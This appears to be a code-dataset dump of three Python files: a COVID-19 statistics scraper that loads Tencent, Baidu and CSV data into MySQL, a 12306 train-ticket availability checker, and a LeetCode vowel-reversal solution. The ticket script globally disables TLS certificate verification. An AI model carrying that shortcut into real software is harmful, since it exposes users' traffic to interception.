confirm, confirm_add,nowConfirm,nowConfirm_add, suspect,\n heal, heal_add, dead, dead_add])\n\n # 美国数据\n for infos in data_all[\"foreignList\"]:\n name = infos[\"name\"]\n continent = infos[\"continent\"]\n nowConfirm = infos[\"nowConfirm\"]\n confirm = infos[\"confirm\"]\n confirm_add = infos[\"confirmAdd\"]\n suspect = infos[\"suspect\"]\n heal = infos[\"heal\"]\n dead = infos[\"dead\"]\n confirm_cmp = infos[\"confirmCompare\"]\n nowConfirm_cmp = infos[\"nowConfirmCompare\"]\n heal_cmp = infos[\"healCompare\"]\n dead_cmp = infos[\"deadCompare\"]\n if (infos[\"name\"] == \"美国\"):\n ds = infos[\"y\"] +\".\" + infos[\"date\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup)\n for i in infos[\"children\"]:\n city = i[\"name\"]\n citymap = i[\"nameMap\"]\n cconfirm = i[\"confirm\"]\n cconfirm_add = i[\"confirmAdd\"]\n csuspect = i[\"suspect\"]\n cheal = i[\"heal\"]\n cdead = i[\"dead\"]\n america.append([ds, name, city, citymap, cconfirm, cconfirm_add, csuspect, cheal, cdead])\n break\n\n return america,details\n\n#抓取全球各国历史数据(文件)\ndef get_global_country_history_data():\n try:\n details = []\n with open('./static/json/world-country-history.json','rb') as f:\n jsonStr = json.load(f)\n for infos in jsonStr:\n ds = datetime.datetime.strptime(str(infos[\"dateId\"]), '%Y%m%d').strftime('%Y-%m-%d')\n country = infos[\"countryName\"]\n country_code = infos[\"countryCode\"]\n nowConfirm = infos[\"currentConfirmedCount\"]\n nowConfirm_add = infos[\"currentConfirmedIncr\"]\n confirm = infos[\"confirmedCount\"]\n confirm_add = infos[\"confirmedIncr\"]\n suspect = infos[\"suspectedCount\"]\n suspect_add = infos[\"suspectedCountIncr\"]\n heal = infos[\"curedCount\"]\n dead = infos[\"deadCount\"]\n heal_add = infos[\"curedIncr\"]\n dead_add = infos[\"deadIncr\"]\n details.append(\n [ds, country,country_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add,\n dead, dead_add])\n f.close()\n return details\n except Exception as e:\n print(e)\n\n# 获取美国各州历史数据\ndef get_america_state_history_data():\n try:\n details = []\n with open('./static/json/america-provinces-history.json','rb') as f:\n jsonStr = json.load(f)\n name = '美国'\n for infos in jsonStr:\n ds = datetime.datetime.strptime(str(infos[\"dateId\"]), '%Y%m%d').strftime('%Y-%m-%d')\n city = infos[\"provinceName\"]\n citymap = infos[\"provinceCode\"]\n confirm = infos[\"confirmedCount\"]\n confirm_add = infos[\"confirmedIncr\"]\n suspect = infos[\"suspectedCount\"]\n heal = infos[\"curedCount\"]\n dead = infos[\"deadCount\"]\n if(suspect == None): suspect = 0\n if(heal == None): heal = 0\n if(dead == None): dead = 0\n if(confirm == None): confirm =0\n if (confirm_add == None): confirm_add = 0\n details.append([ds, name, city, citymap, confirm, confirm_add, suspect, heal, dead])\n f.close()\n return details\n except Exception as e:\n print(e)\n\n# 获取美国历史总体数据\ndef get_america_history_data():\n try:\n details = []\n with open('./static/json/america-history.json','rb') as f:\n jsonStr = json.load(f)\n name = '美国'\n for infos in jsonStr:\n ds = datetime.datetime.strptime(str(infos[\"date\"]), '%Y%m%d').strftime('%Y-%m-%d')\n confirm = infos[\"positive\"] # 阳性累计\n confirm_add = infos[\"positiveIncrease\"] # 阳性新增\n suspect = 0\n heal = infos[\"recovered\"]\n dead = infos[\"death\"]\n dead_add = infos[\"deathIncrease\"]\n hospitalized = infos[\"hospitalized\"] #住院累计\n nowHospitalized = infos[\"hospitalizedCurrently\"] #当前住院 现有住院\n hospitalized_add = infos[\"hospitalizedIncrease\"] #住院新增\n 
nowInIcu = infos[\"inIcuCurrently\"] # 当前ICU\n inIcu = infos[\"inIcuCumulative\"] # 累计ICU\n negative = infos[\"negative\"] # 阴性检测累计\n negative_add = infos['negativeIncrease']\n onVentilator = infos['onVentilatorCumulative'] #使用呼吸机累计\n nowOnVentilator = infos['onVentilatorCurrently'] #当前使用呼吸机\n totalTestResults = infos['totalTestResults'] #累计监测\n totalTestResults_add = infos['totalTestResultsIncrease']\n if(onVentilator == None): onVentilator = 0\n if(nowOnVentilator == None): nowOnVentilator = 0\n if(nowHospitalized == None): nowHospitalized = 0\n if(hospitalized == None): hospitalized = 0\n if(hospitalized_add == None): hospitalized_add = 0\n if(heal == None): heal = 0\n if(dead == None): dead = 0\n if(confirm == None): confirm =0\n if (confirm_add == None): confirm_add = 0\n if (nowInIcu == None): nowInIcu = 0\n if (inIcu == None): inIcu = 0\n if (negative == None): negative = 0\n details.append([ds, confirm, confirm_add, suspect, heal, dead, dead_add, negative,negative_add,hospitalized, hospitalized_add, nowHospitalized,\n inIcu, nowInIcu, onVentilator,nowOnVentilator,totalTestResults,totalTestResults_add])\n f.close()\n return details\n except Exception as e:\n print(e)\n\n#抓取全球历史总体数据\ndef get_global_histroy_data():\n url = \"https://api.inews.qq.com/newsqa/v1/automation/modules/list?modules=FAutoGlobalStatis,FAutoGlobalDailyList\"\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36\"\n }\n response = requests.get(url=url, headers=headers)\n res = json.loads(response.text)\n data = res[\"data\"]\n\n global_day_list = data['FAutoGlobalDailyList']\n global_statis = data['FAutoGlobalStatis']\n global_history = {}\n for global_day in global_day_list:\n ds = global_day[\"y\"] + \".\" + global_day[\"date\"]\n confirm = global_day[\"all\"][\"confirm\"]\n dead = global_day[\"all\"][\"dead\"]\n heal = global_day[\"all\"][\"heal\"]\n confirm_add = global_day[\"all\"][\"newAddConfirm\"]\n dead_rate = global_day[\"all\"][\"deadRate\"]\n heal_rate = global_day[\"all\"][\"healRate\"]\n global_history[ds] = {\"confirm\": confirm, \"confirm_add\": confirm_add, \"dead\": dead, \"heal\": heal,\n \"dead_rate\": dead_rate, \"heal_rate\": heal_rate}\n\n ds = global_statis[\"lastUpdateTime\"]\n confirm = int(global_statis[\"confirm\"])\n dead = int(global_statis[\"dead\"])\n heal = int(global_statis[\"heal\"])\n dead_rate = round(dead / confirm, 4) if confirm > 0 else 0.00\n heal_rate = round(heal / confirm, 4) if confirm > 0 else 0.00\n global_history[ds] = {\"confirm\": confirm,\n \"confirm_add\": global_statis[\"nowConfirmAdd\"],\n \"dead\": dead,\n \"heal\": heal,\n \"dead_rate\": dead_rate,\n \"heal_rate\": heal_rate}\n global_statis_list = [global_statis[key] for key in global_statis]\n\n return global_history, global_statis_list\n\n# 热搜新闻数据\ndef get_hotnews_data():\n url = \"https://voice.baidu.com/act/newpneumonia/newpneumonia/\"\n # 无头模式,无需打开浏览器,效率快\n option = ChromeOptions()\n # 隐藏浏览器\n option.add_argument(\"--headless\")\n # linux部署\n option.add_argument(\"--no-sandbox\")\n browser = Chrome(options = option)\n browser.get(url)\n # 整个网站的源码\n # print(browser.page_source)\n # 模拟按钮模仿人浏览网站点击展开\n but = browser.find_element_by_xpath('//*[@id=\"ptab-1\"]/div[3]/div[11]/span')\n # but = browser.find_element_by_css_selector('#ptab-1 > div.Virus_1-1-304_2SKAfr > div.Common_1-1-304_3lDRV2 > span')\n\n # 模拟点击按钮,点击展开\n but.click()\n # 等待1秒\n time.sleep(1)\n #获取热搜头条信息\n content = []\n link = []\n news = 
browser.find_elements_by_xpath('//*[@id=\"ptab-1\"]/div[3]/div/div[2]/a/div')\n a = browser.find_elements_by_xpath('//*[@id=\"ptab-1\"]/div[3]/div/div[2]/a')\n\n for i, j in zip(news, a):\n # 热搜头条标题\n content.append(i.text)\n link.append(j.get_attribute(\"href\"))\n\n # 关闭浏览\n browser.close()\n return content,link\n\n\n# ----------------爬取数据结束------------------------\n\n# ----------------更新国内数据start------------------------\n#更新国内疫情详细数据\ndef update_details():\n cursor = None\n connect = None\n try:\n li = get_tencent_data()[1] #0历史,1当前数据\n connect,cursor = get_conn()\n sql = \"INSERT INTO details (update_time, province, city, nowConfirm, confirm, confirm_add,suspect, heal, dead, dead_rate, heal_rate) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select %s = (select update_time from details order by id desc limit 1)\"\n # 对比当前最大时间戳,相同不更新,不相同则更新\n cursor.execute(sql_query, li[0][0])\n if not cursor.fetchone()[0]:\n #time.asctime() 接受时间元组并返回一个可读的形式为\"Tue Dec 11 18:07:14 2008\"\n # 以 f开头表示在字符串内支持大括号内的python 表达式\n print(f\"{time.asctime()}开始更新数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() #提交事务\n print(f\"{time.asctime()}更新到最新数据\")\n else:\n print(f\"{time.asctime()}已是最新数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect,cursor)\n\n#更新国内各省疫情历史每日数据\ndef update_province_history_data():\n cursor = None\n connect = None\n try:\n li = get_province_history_data() #0历史,1当前数据\n connect,cursor = get_conn()\n sql = \"INSERT INTO province_history (ds, province,province_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add, dead, dead_add, nowSevere, nowMidSevere) \" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select confirm from province_history where ds = %s and province = %s\"\n # sql_query = \"select %s = (select ds from province_history order by id desc limit 1)\"\n # 对比当前最大时间戳,相同不更新,不相同则更新\n print(f\"{time.asctime()}开始更新各省历史数据\")\n for item in li:\n if not cursor.execute(sql_query, [item[0],item[1]]):\n print(item)\n cursor.execute(sql, item)\n connect.commit() #提交事务\n print(f\"{time.asctime()}已更新到最新各省历史数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect,cursor)\n\n\n# 插入国内history数据\ndef insert_china_history():\n cursor = None\n connect = None\n try:\n dic = get_tencent_data()[0] #0历史数据\n print(f\"{time.asctime()}开始插入历史数据\")\n connect,cursor = get_conn()\n sql = \"insert into china_history values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n for k, v in dic.items():\n print(\"\\n\")\n print(k)\n print(\"----\")\n print(v)\n print(\"\\n\")\n cursor.execute(sql, [k,v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"suspect\"), v.get(\"suspect_add\"),\n v.get(\"heal\"), v.get(\"heal_add\"), v.get(\"dead\"), v.get(\"dead_add\"), v.get(\"importedCase\"),\n v.get(\"importedCase_add\"), v.get(\"noInfect\"), v.get(\"noInfect_add\"), v.get(\"localConfirm\"),\n v.get(\"localConfirm_add\"), v.get(\"nowConfirm\"), v.get(\"nowSevere\"),v.get(\"dead_rate\"),\n v.get(\"heal_rate\"),v.get(\"dead_rate_add\"),v.get(\"heal_rate_add\")])\n connect.commit()\n print(f\"{time.asctime()}插入历史数据完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect,cursor)\n\n#更新国内历史数据\ndef update_china_history_data():\n cursor = None\n connect = None\n try:\n dic = get_tencent_data()[0] # 0历史数据\n print(f\"{time.asctime()}开始更新历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into china_history 
values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n sql_query = \"select confirm from china_history where ds = %s\"\n #查询数据是否存在数据库里,不存在则插入\n for k,v in dic.items():\n if not cursor.execute(sql_query, k):\n print(k, v)\n cursor.execute(sql, [k,v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"suspect\"), v.get(\"suspect_add\"),\n v.get(\"heal\"), v.get(\"heal_add\"), v.get(\"dead\"), v.get(\"dead_add\"), v.get(\"importedCase\"),\n v.get(\"importedCase_add\"), v.get(\"noInfect\"), v.get(\"noInfect_add\"), v.get(\"localConfirm\"),\n v.get(\"localConfirm_add\"), v.get(\"nowConfirm\"), v.get(\"nowSevere\"),v.get(\"dead_rate\"),\n v.get(\"heal_rate\"),v.get(\"dead_rate_add\"),v.get(\"heal_rate_add\")])\n connect.commit()\n print(f\"{time.asctime()}历史数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n#插入地区风险数据\ndef insert_localrisk():\n cursor = None\n connect = None\n try:\n li = get_localrisk_data() # 0历史数据\n print(li)\n print(f\"{time.asctime()}开始插入风险数据\")\n connect, cursor = get_conn()\n sql = \"insert into localrisk(ds, province, city, nowConfirm, confirm, confirm_add, heal,dead, grade) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n for i in li:\n cursor.execute(sql, i)\n connect.commit()\n print(f\"{time.asctime()}插入风险数据完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n#更新地区风险数据\ndef update_localrisk():\n cursor = None\n connect = None\n try:\n li = get_localrisk_data() # 0历史数据\n\n print(f\"{time.asctime()}开始插入风险数据\")\n connect, cursor = get_conn()\n sql = \"insert into localrisk(ds, province, city, nowConfirm, confirm, confirm_add, heal,dead, grade) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n sql_query = \"select %s = (select ds from localrisk where city = %s order by ds desc limit 1)\"\n # 对比当前最大时间戳,相同不更新,不相同则更新\n for i in li:\n cursor.execute(sql_query, (i[0], i[2]))\n if not cursor.fetchone()[0]:\n print(i[0]+i[1]+i[2])\n cursor.execute(sql, i)\n connect.commit()\n print(f\"{time.asctime()}插入风险数据完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# 更新热搜数据\ndef update_hotsearch():\n cursor = None\n connect = None\n try:\n context,link = get_hotnews_data()\n print(f\"{time.asctime()}开始更新热搜数据\")\n connect, cursor = get_conn()\n sql = \"insert into hotsearch(dt,content,link) values(%s,%s,%s)\"\n sql_query = \"select * from hotsearch where content = %s\"\n ts = time.strftime(\"%Y-%m-%d %X\")\n for i,j in zip(context,link):\n if not cursor.execute(sql_query, i):\n print(ts, i, j)\n cursor.execute(sql, (ts, i, j))\n connect.commit() # 提交事务\n print(f\"{time.asctime()}热搜数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# ----------------更新国内数据end------------------------\n\n# ----------------更新全球数据start------------------------\n\n# 更新全球各国最新数据\ndef update_global_country_latest_data():\n cursor = None\n connect = None\n try:\n li = get_global_country_latest_data()[1] #0美国,1全球\n connect, cursor = get_conn()\n sql = \"INSERT INTO global_country_latest(ds, country, continent,confirm, confirm_add,nowConfirm, nowConfirm_add,suspect, heal,heal_add, dead, dead_add) \" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select %s = (select ds from global_country_latest order by id desc limit 1)\"\n cursor.execute(sql_query, li[0][0])\n if not cursor.fetchone()[0]:\n print(f\"{time.asctime()}开始更新全球数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新全球数据\")\n 
else:\n print(f\"{time.asctime()}已是最新全球数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 插入全球各国历史数据(没有更新操作)\ndef insert_global_country_history_data():\n cursor = None\n connect = None\n try:\n li = get_global_country_history_data()\n print(f\"{time.asctime()}开始更新全球各国历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into global_country_history (ds, country,country_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add, dead, dead_add) \" \\\n \"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n print(f\"{time.asctime()}开始更新数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit()\n print(f\"{time.asctime()}全球各国历史数据更新完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 更新美国各州最新数据\ndef update_america_state_latest():\n cursor = None\n connect = None\n try:\n li = get_global_country_latest_data()[0] # 0美国,1全球\n connect, cursor = get_conn()\n sql = \"INSERT INTO america_state (ds, name, city, cityMap, confirm, confirm_add, suspect, heal, dead)\" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select %s = (select ds from america_state order by id desc limit 1)\"\n cursor.execute(sql_query, li[0][0])\n if not cursor.fetchone()[0]:\n print(f\"{time.asctime()}开始更新美国各州最新数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新美国各州最新数据\")\n else:\n print(f\"{time.asctime()}已是最新美国数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 插入美国各州历史数据(无更新)\ndef insert_america_state_history():\n cursor = None\n connect = None\n try:\n li = get_america_state_history_data()\n connect, cursor = get_conn()\n sql = \"INSERT INTO america_state (ds, name, city, cityMap, confirm, confirm_add, suspect, heal, dead)\" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n print(f\"{time.asctime()}开始更新美国各州历史数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新美国各洲历史数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 插入美国历史数据(无更新)\ndef insert_america_history():\n cursor = None\n connect = None\n try:\n li = get_america_history_data()\n connect, cursor = get_conn()\n sql = \"INSERT INTO america_history (ds, confirm, confirm_add, suspect, heal, dead, dead_add, negative,negative_add,hospitalized, hospitalized_add, nowHospitalized, \" \\\n \"inIcu, nowInIcu, onVentilator,nowOnVentilator,totalTestResults,totalTestResults_add)\" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n print(f\"{time.asctime()}开始更新美国历史数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新美国历史数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n\n#插入全球历史总体数据\ndef insert_global_history():\n cursor = None\n connect = None\n try:\n dic = get_global_histroy_data()[0] # 0历史数据,1最新日期的总体数据\n print(f\"{time.asctime()}开始插入全球历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into global_history values(%s,%s,%s,%s,%s,%s,%s)\"\n for k, v in dic.items():\n print(\"\\n\")\n print(k)\n print(\"----\")\n print(v)\n print(\"\\n\")\n cursor.execute(sql, [k, v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"dead\"), v.get(\"heal\"),\n v.get(\"dead_rate\"), v.get(\"heal_rate\")])\n connect.commit()\n print(f\"{time.asctime()}插入全球历史数据完毕\")\n except:\n traceback.print_exc()\n finally:\n 
close_conn(connect, cursor)\n\n# 更新全球历史数据\ndef update_global_history_data():\n cursor = None\n connect = None\n try:\n dic = get_global_histroy_data()[0] # 0历史数据\n print(f\"{time.asctime()}开始更新全球历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into global_history values(%s,%s,%s,%s,%s,%s,%s)\"\n sql_query = \"select confirm from global_history where ds = %s\"\n # 查询数据是否存在数据库里,不存在则插入\n for k, v in dic.items():\n if not cursor.execute(sql_query, k):\n print(k, v)\n cursor.execute(sql, [k, v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"dead\"), v.get(\"heal\"),\n v.get(\"dead_rate\"), v.get(\"heal_rate\")])\n connect.commit()\n print(f\"{time.asctime()}全球历史数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# ----------------国外全球处理end------------------------\n\n\n\n\n# ----------------爬取疫苗数据start--------------------------\n\n# 获取全球疫苗每百人接种数据和全球疫苗累计接种数据\ndef get_total_vaccinations_data():\n # 读取数据\n per_data = pd.read_csv(r'./static/csv/covid-vaccination-doses-per-capita.csv')\n total_data = pd.read_csv(r'./static/csv/cumulative-covid-vaccinations.csv')\n per_data.head()\n total_data.head()\n\n vaccine_list = []\n for i in range(0, per_data.shape[0]): # 利用shape的第一个元素来获取数据的数量\n per_row_data = per_data.iloc[i] # 获取第每行数据\n total_row_data = total_data.iloc[i]\n per_row_data.fillna('null', inplace=True) # 找出每行的nan(NAN)值以null填充\n value = [per_row_data[2], str(per_row_data[0]), str(per_row_data[1]), total_row_data[3],\n per_row_data[3]] # 读取第每行中每列数据,由于数据库添加使用的都是字符串形式添加故都取str\n vaccine_list.append(value)\n\n return vaccine_list\n\n# 获取完全接种COVID-19疫苗的总人口中的份额和总人数\ndef get_people_fully_vaccinated_data():\n per_data = pd.read_csv(r'./static/csv/share-people-fully-vaccinated-covid.csv')\n total_data = pd.read_csv(r'./static/csv/people-fully-vaccinated-covid.csv')\n per_data.head()\n total_data.head()\n\n vaccine_list = []\n for i in range(0, per_data.shape[0]): # 利用shape的第一个元素来获取数据的数量\n per_row_data = per_data.iloc[i] # 获取第每行数据\n total_row_data = total_data.iloc[i]\n per_row_data.fillna('null', inplace=True) # 找出每行的nan(NAN)值以null填充\n value = [per_row_data[2], str(per_row_data[0]), str(per_row_data[1]), total_row_data[3],\n per_row_data[3]] # 读取第每行中每列数据,由于数据库添加使用的都是字符串形式添加故都取str\n vaccine_list.append(value)\n return vaccine_list\n\n# 获取已接受至少一剂COVID-19疫苗的总人口中的份额和总人数\ndef get_people_vaccinated_data():\n per_data = pd.read_csv(r'./static/csv/share-people-vaccinated-covid.csv')\n total_data = pd.read_csv(r'./static/csv/people-vaccinated-covid.csv')\n per_data.head()\n total_data.head()\n\n vaccine_list = []\n for i in range(0, per_data.shape[0]): # 利用shape的第一个元素来获取数据的数量\n per_row_data = per_data.iloc[i] # 获取第每行数据\n total_row_data = total_data.iloc[i]\n per_row_data.fillna('null', inplace=True) # 找出每行的nan(NAN)值以null填充\n value = [per_row_data[2], str(per_row_data[0]), str(per_row_data[1]), total_row_data[3],\n per_row_data[3]] # 读取第每行中每列数据,由于数据库添加使用的都是字符串形式添加故都取str\n vaccine_list.append(value)\n return vaccine_list\n\n\n# ----------------爬取疫苗数据eng----------------------------\n\n# ----------------手动更新疫苗数据start--------------------------\n\n# 更新全球疫苗每百人接种数据和全球疫苗累计接种数据\ndef update_total_vaccinations_data():\n #连接数据库\n cursor = None\n connect = None\n try:\n connect, cursor = get_conn()\n vaccine_list = get_total_vaccinations_data()\n print(f\"{time.asctime()}全球疫苗每百人接种和累计接种数据开始更新\")\n sql = \"insert into `global_total_vaccinations`(ds,country,code,total_vaccine,per_hundred) values(%s,%s,%s,%s,%s)\"\n for item in vaccine_list: # 利用shape的第一个元素来获取数据的数量\n print(item)\n 
cursor.execute(sql, item)\n        connect.commit()\n        print(f"{time.asctime()}全球疫苗每百人接种和累计接种数据更新完毕")\n\n    except:\n        traceback.print_exc()\n    finally:\n        close_conn(connect, cursor)\n\n# 更新完全接种COVID-19疫苗的总人口中的份额和总人数\ndef update_people_fully_vaccinated_data():\n    #连接数据库\n    cursor = None\n    connect = None\n    try:\n        connect, cursor = get_conn()\n        vaccine_list = get_people_fully_vaccinated_data()\n        print(f"{time.asctime()}全球疫苗完全接种COVID-19疫苗的总人口中的份额和总人数数据开始更新")\n        sql = "insert into `global_people_fully_vaccinated`(ds,country,code,people_fully_vaccinated,people_fully_vaccinated_per_hundred) values(%s,%s,%s,%s,%s)"\n        for item in vaccine_list: # 利用shape的第一个元素来获取数据的数量\n            print(item)\n            cursor.execute(sql, item)\n        connect.commit()\n        print(f"{time.asctime()}全球疫苗完全接种COVID-19疫苗的总人口中的份额和总人数数据更新完毕")\n\n    except:\n        traceback.print_exc()\n    finally:\n        close_conn(connect, cursor)\n\n# 更新已接受至少一剂COVID-19疫苗的总人口中的份额和总人数\ndef update_people_vaccinated_data():\n    #连接数据库\n    cursor = None\n    connect = None\n    try:\n        connect, cursor = get_conn()\n        vaccine_list = get_people_vaccinated_data()\n        print(f"{time.asctime()}全球疫苗已接受至少一剂COVID-19疫苗的总人口中的份额和总人数数据开始更新")\n        sql = "insert into `global_people_vaccinated`(ds,country,code,people_vaccinated,people_vaccinated_per_hundred) values(%s,%s,%s,%s,%s)"\n        for item in vaccine_list: # 利用shape的第一个元素来获取数据的数量\n            print(item)\n            cursor.execute(sql, item)\n        connect.commit()\n        print(f"{time.asctime()}全球疫苗已接受至少一剂COVID-19疫苗的总人口中的份额和总人数数据更新完毕")\n\n    except:\n        traceback.print_exc()\n    finally:\n        close_conn(connect, cursor)\n\n\n# ----------------手动更新疫苗数据处理end--------------------------\n\n\n\nif __name__ == "__main__":\n    # update_hotsearch()\n    # print(get_america_history_data())\n    # 参数列表长度\n    argc = len(sys.argv)\n    if(argc == 1):\n        s = """\n        请输入参数\n        参数说明:\n        up_his 更新全球和中国的历史数据\n        up_hot 更新实时热搜\n        up_det 更新全球和中国疫情详细数据\n        up_risk 更新地区风险\n        """\n        print(s)\n    else:\n        # 0表示文件路径,1开始是参数\n        order = sys.argv[1]\n        if order == 'up_his':\n            update_china_history_data()\n            update_global_history_data()\n            update_province_history_data()\n        elif order == 'up_hot':\n            update_hotsearch()\n        elif order == 'up_risk':\n            update_localrisk()\n        elif order == 'up_det':\n            update_details()\n            update_global_country_latest_data()\n            update_america_state_latest()\n        # insert_america_state_history()\n        # insert_america_history()\n","repo_name":"crverr/covid19-system","sub_path":"spider-yiqing-data.py","file_name":"spider-yiqing-data.py","file_ext":"py","file_size_in_byte":38930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"12446658067","text":"#coding=utf-8;\n\n\nimport urllib.request\n\nimport ssl\nimport json\n\nssl._create_default_https_context = ssl._create_unverified_context;\ntarget_url = "https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=2017-12-03&leftTicketDTO.from_station=SHH&leftTicketDTO.to_station=PEN&purpose_codes=ADULT"\nuser_agent = "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Mobile Safari/537.36"\n\n# 获取车次信息\n"""\n    https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=2017-12-03&leftTicketDTO.from_station=SHH&leftTicketDTO.to_station=PEN&purpose_codes=ADULT\n"""\n\n\ndef getTrainList():\n    req = urllib.request.Request(target_url);\n    req.add_header("User-Agent",user_agent);\n    rsp = urllib.request.urlopen(req);\n    html = rsp.read();\n    # 将截取到的json 数据转换成字典\n    dic = json.loads(html);\n    # 获取到车次信息 进行返回\n    return dic["data"]["result"];\n\n# 处理返回的车次信息\n"""\n    
每一条车次信息 字段对应的位置\n    索引为23 对应的软卧\n    28 对应的是硬卧\n    29 对应的是硬座\n    26 对应的是无座\n    3 对应的车次\n"""\ntest_flag = 0;\ndef dealWithTrainInfo(dict):\n    # 每一条车次信息以及字段\n    for item in dict:\n        temp_list = item.split('|');\n        # 以下代码是为了知道字段对应的索引\n        # global test_flag;\n        # for i in temp_list:\n        #     print('%s--%s',(test_flag,i));\n        #     test_flag += 1;\n        try:\n            # 此处 要进行类型转换 字符串与0作比较,永远都是大于0的\n            if int(temp_list[23]) > 0:\n                print (temp_list[3]+'--'+'有票');\n        except:\n            # 在中文前面加上U 表示字符串是unicode 编码\n            if temp_list[23] == u'有':\n                print(temp_list[3] +'--'+ '有票');\n            else:\n                print(temp_list[3] +'--'+ "无票");\n\nif __name__ == '__main__':\n\n    dict = getTrainList();\n    dealWithTrainInfo(dict);","repo_name":"AlexanderYeah/SKPy12306Demo","sub_path":"Lession2/12306.py","file_name":"12306.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"72095957267","text":"#\n# @lc app=leetcode.cn id=345 lang=python3\n#\n# [345] 反转字符串中的元音字母\n#\n# https://leetcode-cn.com/problems/reverse-vowels-of-a-string/description/\n#\n# algorithms\n# Easy (46.11%)\n# Total Accepted: 6.7K\n# Total Submissions: 14.5K\n# Testcase Example: '"hello"'\n#\n# 编写一个函数,以字符串作为输入,反转该字符串中的元音字母。\n#\n# 示例 1:\n#\n# 输入: "hello"\n# 输出: "holle"\n#\n#\n# 示例 2:\n#\n# 输入: "leetcode"\n# 输出: "leotcede"\n#\n# 说明:\n# 元音字母不包含字母"y"。\n#\n#\n\n\nclass Solution:\n    def reverseVowels(self, s: str) -> str: \n        i = 0\n        j = len(s) - 1\n        yuan = 'aeiouAEIOU'\n        s = [x for x in s]\n        while i < j:\n            while i < j and s[i] not in yuan:\n                i += 1\n            while i < j and s[j] not in yuan:\n                j -= 1\n            if i < j:\n                t = s[i]\n                s[i] = s[j]\n                s[j] = t\n                i += 1\n                j -= 1\n        return "".join(s)\n","repo_name":"fhyPayaso/fhyPayaso.github.io","sub_path":"code/Algorithm/leetcode/u999/345.反转字符串中的元音字母.py","file_name":"345.反转字符串中的元音字母.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
